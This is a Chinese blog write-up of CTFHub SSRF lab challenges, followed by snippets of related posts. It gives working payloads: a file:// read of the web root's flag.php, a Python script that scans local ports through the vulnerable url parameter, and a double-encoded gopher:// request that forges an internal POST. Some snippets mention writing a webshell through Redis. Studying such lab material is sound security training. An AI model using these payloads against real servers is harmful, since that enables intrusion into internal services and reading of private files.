CTFHub SSRF

已于 2023-11-18 16:31:32 修改
阅读量61 收藏
点赞数
分类专栏: # SSRF 文章标签: 安全 web安全 笔记 网络安全
于 2023-11-18 16:28:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51559599/article/details/134479846
版权

CTFHub

内网访问

直接请求服务器本地 flag.php 文件

image-20231117165431322

伪协议读取文件

file:///var/www/html/flag.php

image-20231118150630352

端口扫描

image-20231118150857037

访问未开放端口不显示信息

探测开放端口

# port.py
import requests
for i in range(8000,9001):
    url = f"http://challenge-80bae7467b23066f.sandbox.ctfhub.com:10800/?url=http://127.0.0.1:{i}"
    print(f"[{i}]"+url)
    res = requests.get(url=url)
    if len(res.content) != 0:
        print(i)
        break

image-20231118151835795

image-20231118151944215

POST 请求(gopher)

需要让服务器发送 post 请求

image-20231118152139912

访问 flag,bp 抓包获取 key

?url=http://127.0.0.1/flag.php

image-20231118154059469

构造 post 请求

POST /flag.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

key=7c1031172cade4f3a5eb3fe0417dbd1f

hackbar 编辑 url,并对 POST 内容进行 url 编码,注意使用 gopher gopher://127.0.0.1:80/_POST 中的 80 端口和 POST 前的 _

http://challenge-e3cab89d8da742f6.sandbox.ctfhub.com:10800/
?url=gopher://127.0.0.1:80/_POST /flag.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

key=7c1031172cade4f3a5eb3fe0417dbd1f

编码 POST 请求,将换行的位置编码出来的 %0A 前加 %0D

http://challenge-e3cab89d8da742f6.sandbox.ctfhub.com:10800/
?url=gopher://127.0.0.1:80/_POST%20%2Fflag.php%20HTTP%2F1.1%0D%0AHost%3A%20127.0.0.1%0D%0AContent-Type%3A%20application%2Fx-www-form-urlencoded%0D%0AContent-Length%3A%2036%0D%0A%0D%0Akey%3D7c1031172cade4f3a5eb3fe0417dbd1f

image-20231118161849518

再次编码

http://challenge-e3cab89d8da742f6.sandbox.ctfhub.com:10800/
?url=gopher://127.0.0.1:80/_POST%2520%252Fflag.php%2520HTTP%252F1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Type%253A%2520application%252Fx-www-form-urlencoded%250D%250AContent-Length%253A%252036%250D%250A%250D%250Akey%253D7c1031172cade4f3a5eb3fe0417dbd1f

image-20231118161908589

上传,获取 flag

image-20231118161943853

gjl_
关注
专栏目录
CtfHub ssrf 文件上传
qq_51553814的博客
08-22 1563
CtfHub ssrf 文件上传 原理 与CtfHub ssrf Post请求类似,文件上传同样是发出Post请求,只不过Post请求报文中包含有我们的shell文件,关于ssrf post请求在另一篇有解释ssrf post请求 解题 同样,显示访问内网的flag.php文件,也就是url=127.0.0.1/flag.php,可以看到允许文件上传 也是通过file协议看一下flag.php的源码 如上图所示,后端只允许我们通过内网的方式上传文件,如果我们通过上面的文件上传,相当于是从我们本地将文件传
CTFHUB SSRF
CN天狼
02-14 1356
CTFHUB SSRF post 上传文件 fastcgi Redis协议 URL Bypass 数字IP Bypass 302跳转 Bypass DNS重绑定 Bypass
CTFHUB SSRF POST小记
I_WORM的博客
02-02 1442
ctfhub ssrf post小记
CTFHub SSRF总结
iO快到碗里来
08-25 2336
内网访问 题目描述:尝试访问位于127.0.0.1的flag.php吧 进入题目: 可以看到该链接可以传入一个参数url=,跟据题目描述直接构造payload:url=http://127.0.0.1/flag.php,成功得到flag。 伪协议读取文件 题目描述:尝试去读取一下Web目录下的flag.php吧 进入题目: 和第一题一样,可以传入一个参数url=,首先尝试第一题的payload:url=http://127.0.0.1/flag.php 蟹bro,What’s up ??? F12看
CTFHUB SSRF 【全】
Jay17的博客
04-17 1399
CTFHUB SSRF 题解 【全】
ctfhub SSRF Redis协议
m0_63944205的博客
07-24 220
5.这里报错我们先不用管尝试查询一下,我们看到我们的一句话木马传入成功。4.然后将编码后的gopher传入网址。3.将生成gopher拿去url编码。7.进入文件夹查找flag文件。2.使用工具生成gopher。6.这里我们用蚁剑进行连接。
CTFhub ssrf 端口扫描&文件上传
m0_64815693的博客
09-02 2548
CTFhub ssrf 端口扫描&文件上传
ctfhub ssrf
shinygod的博客
09-26 533
先用file读一下源码,flag.php中有key且要本地访问,index.php可以传参,可以利用index里的curl用gopher构造post请求,在本地访问flag.php。用gopher写文件,具体原理可以看(https://blog.csdn.net/shinygod/article/details/126995090)的309题。那么直接打:(具体原理可看:https://blog.csdn.net/shinygod/article/details/127034013 的360题)
CTFHub SSRF Redis协议 WriteUp
柠檬i的博客
12-31 565
SSRF+Redis组合拳绝对路径写webshell
CTFhub SSRF第一部分
qq_41497476的博客
09-16 813
1.内网访问 提示得很明显 就是要利用ssrf漏洞访问127.0.0.1主机内的flag.php. 在查阅资料的过程中还发现了其他的绕过写法,加上这些特殊符号后对结果无影响 2.伪协议读取文件 强调了Web目录,那明显就是要用到绝对路径,file协议是用绝对路径访问本地文件的协议。 Linux系统下,网站路径是 /var/www/html/… 利用该路径去获得flag文件 看一下对比 file协议是引入绝对路径,但不理解为什么用127.0.0.1直接包含的flag.php跟用file协议绝对路径包
CTFHub ssrf
07-29
所以,CTFHub ssrf是指在CTFHub平台上与SSRF相关的内容和挑战。 #### 引用[.reference_title] - *1* [CTFHubSSRF](https://blog.csdn.net/qq_45927819/article/details/123400074)[target="_blank" data-report-...
ctfhub SSRF
08-27
ctfhub是一个CTF训练平台,提供了多个CTF挑战模块,其中包括了SSRF模块。SSRF(Server-Side Request Forgery)是一种攻击技术,可以利用服务器端请求伪造漏洞来发送恶意请求。在ctfhubSSRF模块中,你可以学习和...
CTFHUB SSRF文件上传
07-28
根据提供的引用内容,CTFHUB SSRF文件上传是指通过SSRF漏洞实现对目标服务器进行文件上传的攻击。在文件上传过程中,攻击者可以构造恶意请求,将文件上传到目标服务器上。具体的攻击方法可以使用常见的绕过技巧,如...
网络安全 网络安全的主要领域 安全威胁 防护技术 安全策略 未来趋势
weixin_42462436的博客
10-03 1454
随着智能手机和平板电脑的广泛使用,移动设备的安全(如数据加密、设备丢失保护等)也成为重点。由国家级或高级黑客组织发起的持续性、高度隐蔽的网络攻击,通常以窃取敏感信息为目的。使用加密、访问控制、数据备份等手段来保护信息免受未经授权的访问、修改或删除。包括防火墙、入侵检测系统(IDS)、入侵防御系统(IPS)等技术的使用。保证操作系统和相关服务的安全,包括权限控制、补丁管理、系统日志监控等。利用全球收集的安全信息和分析工具,提前识别并防御潜在的威胁。关注对虚拟化平台、API安全、数据隔离和访问管理的控制。
如何安全地大规模部署 GenAI 应用程序
网络研究观
10-06 514
将生成式人工智能融入到你的商业模式中,既会带来新的风险,也会带来新的回报。以下是如何应对这些风险。
前置机、跳板机、堡垒机:安全运维领域的“黄金三角”
拉格朗日的学习笔记
09-28 1007
为了确保数据的安全性、提升系统的可靠性和性能,企业需要采用一系列先进的设备和系统来构建坚固的IT防御体系。其中,前置机、跳板机和堡垒机作为关键组件,各自在网络安全和运维管理中发挥着不可替代的作用。
英文论文安全的免费查重网站
最新发布
hallo128的博客
10-06 540
不过请注意,免费工具通常只能提供基础查重功能,对于学术论文的全面查重,付费工具(如Turnitin)会更加准确和可靠。特点: 提供简单易用的免费查重服务,支持英文文本查重。特点: 免费查重工具,可以通过粘贴文本或上传文件进行查重。特点: 集成了语法检查和查重功能,免费版查重不支持大篇幅的文档,可以用来初步检测论文的相似度。特点: 免费版允许每天进行一次查重(限1000字),可以通过复制粘贴或上传文件的方式来检测。安全性: 网站声明不会存储用户的文档,但出于安全考虑,建议在提交前进行适当处理。
从《GTA5》的反外挂斗争看网络安全的重要性
@云安全小杜
09-26 1100
本文将探讨《GTA5》在对抗外挂过程中遇到的挑战,特别是当游戏开发者试图增强游戏安全性时所遭受的DDoS攻击,并从中提炼出对于网络安全的一些启示。然而,随着游戏人气的增长,一些不法分子开始利用技术手段制作并销售外挂程序,这些程序可以让使用者在游戏中获得不公平的优势,从而破坏了游戏环境。请注意,以上内容是基于假设的情景编写的技术分析文章,实际案例可能涉及更多的细节和技术层面的问题。《GTA5》与外挂之间的斗争提醒我们,在享受数字世界带来的便利的同时,也需要时刻警惕潜在的安全风险,并积极采取措施加以防范。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值